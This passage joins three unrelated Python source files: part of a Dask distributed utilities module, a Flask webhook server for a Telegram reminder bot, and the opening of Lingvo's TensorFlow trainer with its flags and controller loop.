except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
return tempfile.TemporaryFile(extension)
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def deprecated(*, version_removed: str = None):
"""Decorator to mark a function as deprecated
Parameters
----------
version_removed : str, optional
If specified, include the version in which the deprecated function
will be removed. Defaults to "a future release".
"""
def decorator(func):
nonlocal version_removed
msg = f"{funcname(func)} is deprecated and will be removed in"
if version_removed is not None:
msg += f" version {version_removed}"
else:
msg += " a future release"
@functools.wraps(func)
def wrapper(*args, **kwargs):
warnings.warn(msg, DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
return wrapper
return decorator
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
asyncio.get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
@functools.lru_cache(None)
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for logs"""
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
"""A container for multiple logs"""
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
def clean_dashboard_address(addrs: AnyType, default_listen_ip: str = "") -> List[Dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
|
main.py
|
#!/usr/bin/env python
'''
Copyright 2016-2017 Benjamin Elder (BenTheElder) All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
# stdlib imports
from __future__ import print_function
import logging
import threading
from datetime import datetime
# third-party libraries
from flask import Flask, request
# application imports
import olivaw.tasks as tasks
import olivaw.telegram as telegram
from olivaw.settings import secrets
from olivaw.schedule import Scheduler
# pylint: disable=I0011,invalid-name
app = Flask(__name__.split('.')[0])
scheduler = Scheduler()
@app.before_first_request
def init():
"""initialize the server"""
sched_thread = threading.Thread(target=scheduler.run)
sched_thread.daemon = True
sched_thread.start()
@app.route('/')
def hello():
"""Handle Unknown Routes."""
print("/ | hit.")
url = 'http://telegram.me/%s' % (secrets["telegram.bot_name"])
return 'Nothing to see here. <a href="%s">%s</a>' % (url, url)
@app.route(secrets['telegram.webhook_path'], methods=['GET', 'POST'])
def telegram_webhook():
"""handle telegram webhook hits"""
print('telegram_webhook | data: %s'%(request.data))
json = request.get_json(force=True, silent=True)
if not json:
return ''
print("telegram_webhook | json: %s"%(json))
update = telegram.Update(json)
if not update.message or not update.message.text:
return ''
msg = update.message
is_reminder_request, job, reply = tasks.parse_reminder(msg)
print("reminder: ", is_reminder_request, job, reply)
if is_reminder_request:
start_time = datetime.utcfromtimestamp(int(job["timestamp"]))
scheduler.add_job(start_time, job)
telegram.send_reply(secrets['telegram.bot_key'], msg, reply)
return ''
@app.errorhandler(500)
def server_error(e):
"""500 error page handler"""
logging.exception('An error occurred during a request.')
return """
An internal error occurred: <pre>{}</pre>
See logs for full stacktrace.
""".format(e), 500
def main():
"""entry point for server"""
try:
telegram.set_webhook(secrets["telegram.bot_key"], secrets["telegram.webhook_address"])
except:
logging.exception('An error occured when setting the webhook.')
# This is used when running locally. Gunicorn is used to run the
# application on Google App Engine. See entrypoint in app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
if __name__ == '__main__':
main()
|
trainer.py
|
# Lint as: python2, python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=line-too-long
"""Trainer.
To run locally:
.. code-block:: bash
$ bazel build -c opt //lingvo:trainer
$ bazel-bin/lingvo/trainer --logtostderr \
--model=image.mnist.LeNet5 --mode=sync --logdir=/tmp/lenet5 \
--run_locally=cpu
To use GPU, add `--config=cuda` to build command and set `--run_locally=gpu`.
"""
# pylint: enable=line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import inspect
import os
import re
import threading
import time
from lingvo import base_trial
from lingvo import executor
from lingvo import model_registry
import lingvo.compat as tf
from lingvo.core import base_model
from lingvo.core import base_model_params
from lingvo.core import checkpointer
from lingvo.core import cluster_factory
from lingvo.core import inference_graph_exporter
from lingvo.core import metrics
from lingvo.core import py_utils
import numpy as np
import six
from six.moves import range
from six.moves import zip
from lingvo import base_runner
# pylint:disable=g-direct-tensorflow-import
from tensorflow.python.tpu import device_assignment as device_assignment_lib
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop as tpu_training_loop
from tensorflow.python.tpu.ops import tpu_ops
# pylint:enable=g-direct-tensorflow-import
tf.flags.DEFINE_string(
'model', '', 'Name of the model class to train.'
'Must be a model defined in the model_registry.')
tf.flags.DEFINE_string(
'model_task_name', '', 'For multitask models: '
'select task to train/evaluate/decode. '
'Empty means to sample a task (training only).')
tf.flags.DEFINE_string('logdir', '', 'Log directory.')
tf.flags.DEFINE_bool(
'interactive', False,
'If True, enter interactive IPython for the controller job.')
tf.flags.DEFINE_string(
'run_locally', '',
'Can be empty, cpu, or gpu. If not empty, ignores cluster configuration '
'flags and runs controller and trainer in a single local process.')
tf.flags.DEFINE_string('tf_master', '', 'TF runtime.')
tf.flags.DEFINE_string(
'cluster_spec', '', 'A tf.train.ClusterSpec to override the master. '
'The dict is specified as: job=host1:port1,host2:port2,'
'host3:port3@job2=host3:port4,...')
tf.flags.DEFINE_string(
'mode', 'async', 'How this trainer binary is used. '
'async: used in an async training setup; '
'sync: used in a sync training setup; '
'shell: an interactive shell for development; '
'inspect_evaler: print evaler dataset names; '
'inspect_decoder: print decoder dataset names; '
'write_inference_graph: write inference graphs to logdir.')
tf.flags.DEFINE_string('job', '', 'trainer/controller/eval, etc.')
tf.flags.DEFINE_integer('task', 0, 'Task id within the job.')
tf.flags.DEFINE_string('controller_job', '/job:controller', 'Job name.')
tf.flags.DEFINE_integer('controller_gpus', 0, 'Number of controller GPUs.')
tf.flags.DEFINE_string('worker_job', '/job:trainer', 'Job name.')
tf.flags.DEFINE_integer('worker_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('worker_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_integer('worker_tpus', 0, 'Number of tpus to use per replica.')
tf.flags.DEFINE_integer('worker_num_tpu_hosts', 0, 'Number of tpu hosts.')
tf.flags.DEFINE_integer('worker_split_size', 1,
'Number of devices for one split.')
tf.flags.DEFINE_string('ps_job', '/job:ps', 'Job name')
tf.flags.DEFINE_integer('ps_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('ps_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('input_job', '/job:input', 'Job name')
tf.flags.DEFINE_integer('input_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_string(
'input_targets', '', 'Target network addresses for the '
'input job. E.g., a single ip:port, or a list of '
'comma-separated grpc://ip:port, etc.')
tf.flags.DEFINE_string('evaler_job', '/job:evaler', 'Job name')
tf.flags.DEFINE_integer('evaler_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_integer('evaler_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('decoder_job', '/job:decoder', 'Job name')
tf.flags.DEFINE_integer('decoder_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_integer('decoder_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_bool(
'evaler_in_same_address_as_controller', False,
'Whether or not evaler is in the same address space as '
' controller. This flag is meant for unittest only.')
tf.flags.DEFINE_string(
'vizier_reporting_job', 'evaler',
'Job reponsible for reporting metrics. This specifies a '
'job prefix, evaler will match all evaler jobs, while '
'evaler_dev and decoder_dev will only match the corresponding '
'jobs that are on the dev set.')
tf.flags.DEFINE_integer(
'enqueue_max_steps', None, 'Max enqueue steps. -1 meaning no limit.'
' This flag should be set for unit-test only.')
tf.flags.DEFINE_integer('saver_max_to_keep', None,
'Maximum number of recent checkpoints to keep.')
tf.flags.DEFINE_float('saver_keep_checkpoint_every_n_hours', None,
'How often to keep a checkpoint.')
tf.flags.DEFINE_bool(
'checkpoint_in_trainer_tpu', False,
'Whether to enable checkpointing in TrainerTpu, allowing for '
'operation without a separate Controller task.'
'TODO(b/137871213) migrate file/summaries from Controller.')
tf.flags.DEFINE_string(
'tpu', None,
'The Cloud TPU on GCP to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url. If set, other cluster parameters (such as --cluster_spec) will be '
'configured automatically with TPUClusterResolver.')
tf.flags.DEFINE_string(
'gcp_project', None,
'Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
tf.flags.DEFINE_string(
'tpu_zone', None,
'GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
# Please consider adding model params instead of adding flags.
FLAGS = tf.flags.FLAGS
# Map from split size to computation_shape for TPU model parallelism.
SUPPORTED_SPLIT_SIZE = {
1: [1, 1, 1],
2: [1, 1, 2],
4: [1, 2, 2],
8: [2, 2, 2],
16: [4, 2, 2],
32: [4, 4, 2],
64: [4, 8, 2],
128: [8, 8, 2]
}
def ComputationShape(split_size):
"""Decides the computation shape based on the split_size."""
assert (split_size in SUPPORTED_SPLIT_SIZE), ('Model parallelism with %d',
'devices is currently not'
' supported.' % split_size)
return SUPPORTED_SPLIT_SIZE[split_size]
# useful for debugging.
def _StartShell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython # pylint: disable=g-import-not-at-top
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def _ModelAnalysis(model):
"""Returns a text showing variable sizes and their total size."""
class Analyzer(object):
def __init__(self):
self._seen_var = {}
self.total = 0
def __call__(self, v):
assert isinstance(v, tf.Variable)
# pylint: disable=protected-access
if not v.shape.is_fully_defined():
# Only Cudnn RNN params lack static shapes.
if hasattr(v, 'approx_size'):
size = v.approx_size
else:
return '%-20s %10s %s' % (v.shape, 'n/a', v._shared_name)
else:
size = v.shape.num_elements()
if v._shared_name not in self._seen_var:
self._seen_var[v._shared_name] = size
self.total += size
return '%-20s %10d %s' % (v.shape, size, v._shared_name)
analyzer = Analyzer()
output = '\n'
output += model.vars.Transform(analyzer).DebugString()
output += '\n'
output += '=' * 100
output += '\ntotal #params: %10d\n' % (analyzer.total)
return output, analyzer.total
class Controller(base_runner.BaseRunner):
"""Controller for a training cluster."""
def __init__(self, *args, **kwargs):
super(Controller, self).__init__(*args, **kwargs)
assert not self._model_task_name, 'Controller needs all tasks!'
tf.gfile.MakeDirs(self._train_dir)
self._control_dir = os.path.join(self._logdir, 'control')
tf.gfile.MakeDirs(self._control_dir)
self._summary_writer = self._CreateSummaryWriter(self._control_dir)
self._time_steps = [] # A short history of (timestamp, global_step)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self._summary_op = tf.summary.merge_all()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
self.checkpointer = self._CreateCheckpointer(self._train_dir,
self._model)
self._ExportMetrics(params=self.params)
self._model_analysis, self._total_num_params = _ModelAnalysis(self._model)
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._control_dir,
'model_analysis.txt')
self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
tf.train.write_graph(self._graph.as_graph_def(), self._control_dir,
'train.pbtxt')
def _CreateCheckpointer(self, train_dir, model):
"""Wrapper method for override purposes."""
return checkpointer.Checkpointer(train_dir, model)
def Start(self):
self._RunLoop('controller', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _Loop(self):
self._summary_writer.add_graph(self._graph)
with tf.container(self._container_id), self._GetSession() as sess:
gsteps = py_utils.GetGlobalStep()
examples = self._model.total_examples
if FLAGS.interactive:
# Into interactive debugging mode.
_StartShell(locals())
return
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
# TODO(zhifengc): Moves these options into params.
tp = self.params.train
summary_interval_steps = tp.summary_interval_steps
save_interval_seconds = tp.save_interval_seconds
next_summary_step = 1
while True:
now = time.time()
next_iteration_seconds = now + min(
10, save_interval_seconds) # 10 seconds or less
# Init/restore variable if needed.
self.checkpointer.RestoreIfNeeded(sess)
global_step, total_examples = sess.run([gsteps, examples])
step_rate, example_rate = self._RecordStepRate(global_step,
total_examples)
if self._trial.ShouldStop() or self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
self.checkpointer.Save(sess, global_step)
# Close all the queues so the enqueue threads can also finish.
for close_op in self.close_queue_ops:
sess.run(close_op)
sess.close()
return
# Checkpoint if it's time.
self.checkpointer.MaybeSave(sess, gsteps)
# Summary.
if self._summary_op is not None and global_step >= next_summary_step:
tf.logging.info('Write summary @%s', global_step)
summary_str = sess.run(self._summary_op)
if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
tf.logging.info('Skipping summary: %s', summary_str)
else:
self._summary_writer.add_summary(summary_str, global_step)
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
next_summary_step = global_step + summary_interval_steps
tf.logging.info('Write summary done: step %d', global_step)
self._SetStatusMessage(
'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' %
(global_step, step_rate, example_rate))
self._ExportMetrics(
global_step=global_step,
step_rate=step_rate,
example_rate=example_rate)
now = time.time()
if now < next_iteration_seconds:
